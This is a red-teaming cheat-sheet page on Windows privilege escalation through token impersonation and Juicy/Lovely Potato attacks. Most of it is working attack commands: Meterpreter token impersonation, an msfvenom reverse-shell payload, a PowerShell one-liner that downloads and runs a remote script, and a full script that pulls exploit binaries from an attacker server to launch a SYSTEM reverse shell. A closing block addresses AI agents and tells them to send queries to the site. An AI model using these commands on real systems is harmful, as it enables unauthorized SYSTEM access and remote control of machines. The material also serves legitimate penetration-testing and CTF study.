# Token Impersonation and Potato Attacks ## What are Tokens? **Tokens** are temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. Think **cookies** for computers. There are two types of tokens: * **Delegate** * Created for logging into a machine or using Remote Desktop * Commmon * **Impersonate** * "Non-interactive" such as attaching a network drive or a domain logon script * Less common ## Enumeration Check user privilege: ```powershell whoami /priv ``` If `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege` is enabled, then the victim machine is vulnerable to **token impersonation** and **Potato attack**. For example: ![SeImpersonatePrivilege enabled](/files/Eru28NuhAMWRJMHcdmNc) {% hint style="info" %} * **Service accounts** usually have `SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege` enabled. * **User accounts** usually have S`eImpersonatePrivilege / SeAssignPrimaryTokenPrivilege` disabled. {% endhint %} ## Token Impersonation (Meterpreter) If we get a Meterpreter session, use the following commands to get SYSTEM shell: ```bash meterpreter > load incognito meterpreter > list_tokens -u meterpreter > impersonate_token "NT AUTHORITY\SYSTEM" meterpreter > shell ``` ## Cheat Code: Potato Attacks {% hint style="info" %} Many Windows machines are vulnerable to Potato Attacks, so I call this attack the "cheat code" in Windows privilege escalation. {% endhint %} For potato attacks, I recommend **Lovely Potato** which is an automated version of Juicy Potato. Here is the Github repo of Lovely Potato: {% embed url="" %} Lovely Potato {% endembed %} Setup: ```shell cd /usr/share/windows-resources git clone https://github.com/TsukiCTF/Lovely-Potato.git cd Lovely-Potato ``` Open `Invoke-LovelyPotato.ps1` in text editor and modify these two variables: ```powershell $RemoteDir = "http://" $LocalPath = "" ``` In the directory `/usr/share/windows-resources/Lovely-Potato/`, create a msfvenom reverse shell payload: ```shell msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe -o meterpreter.exe ``` Start a web server: ```shell updog ``` Start a listener: ``` rev ``` On the Windows client, start a PowerShell and run `Invoke-LovelyPotato.ps1` remotely via the `DownloadString` method: ```powershell powershell -command "IEX(New-Object Net.WebClient).DownloadString('http:///Invoke-LovelyPotato.ps1')" ``` {% hint style="warning" %} **Wait 10 minutes** for reverse shell running as user `NT AUTHORITY\SYSTEM`. {% endhint %} For completeness, here is the content of the PowerShell script: ```powershell # Configuration $RemoteDir = "http://" $LocalPath = "c:\windows\system32\spool\drivers\color" # Download necessary files for exploitation (New-Object Net.WebClient).DownloadFile("$RemoteDir/JuicyPotato-Static.exe", "$LocalPath\juicypotato.exe") (New-Object Net.WebClient).DownloadFile("$RemoteDir/test_clsid.bat", "$LocalPath\test_clsid.bat") (New-Object Net.WebClient).DownloadFile("$RemoteDir/meterpreter.exe", "$LocalPath\meterpreter.exe") # Enumerate CLSIDs New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT $CLSID = Get-ItemProperty HKCR:\clsid\* | Select-Object AppID,@{N='CLSID'; E={$_.pschildname}} | Where-Object {$_.appid -ne $null} $CLSID | Select-Object CLSID -ExpandProperty CLSID | Out-File -FilePath "$LocalPath\CLSID.list" -Encoding ascii Start-Process -FilePath "cmd" -ArgumentList "/c $LocalPath\test_clsid.bat" -WorkingDirectory $LocalPath # Find System CLSIDs Start-Sleep -s 600 $SystemCLSID = type $LocalPath\result.log | findstr /i "system" | ForEach-Object {echo $_.split(";")[0]} # Launch Juicy Potato $SystemCLSID | ForEach-Object {cmd /c "$LocalPath\juicypotato.exe -t * -p $LocalPath\meterpreter.exe -l 10001 -c $_"} ``` We can do this manually as well. On Kali, make sure your current working directory has the following files: * JuicyPotato-Static.exe * test\_clsid.bat * meterpreter.exe Now start a HTTP server on this directory. On Windows, transfer these three files: ```powershell (New-Object Net.WebClient).DownloadFile("$RemoteDir/JuicyPotato-Static.exe", "$LocalPath\juicypotato.exe") (New-Object Net.WebClient).DownloadFile("$RemoteDir/test_clsid.bat", "$LocalPath\test_clsid.bat") (New-Object Net.WebClient).DownloadFile("$RemoteDir/meterpreter.exe", "$LocalPath\meterpreter.exe") ``` Enumerate CLSIDs: ```powershell New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT $CLSID = Get-ItemProperty HKCR:\clsid\* | Select-Object AppID,@{N='CLSID'; E={$_.pschildname}} | Where-Object {$_.appid -ne $null} $CLSID | Select-Object CLSID -ExpandProperty CLSID | Out-File -FilePath "$LocalPath\CLSID.list" -Encoding ascii Start-Process -FilePath "cmd" -ArgumentList "/c $LocalPath\test_clsid.bat" -WorkingDirectory $LocalPath ``` Find system CLSIDs: ```powershell Start-Sleep -s 600 $SystemCLSID = type $LocalPath\result.log | findstr /i "system" | ForEach-Object {echo $_.split(";")[0]} ``` Wait 10 minutes. Launch Juicy Potato: ```powershell $SystemCLSID | ForEach-Object {cmd /c "$LocalPath\juicypotato.exe -t * -p $LocalPath\meterpreter.exe -l 10001 -c $_"} ``` Now we should get a SYSTEM reverse shell on Kali. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ret2basic.gitbook.io/ctfnote/red-teaming/privilege-escalation/windows-privilege-escalation/token-impersonation-and-potato-attacks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.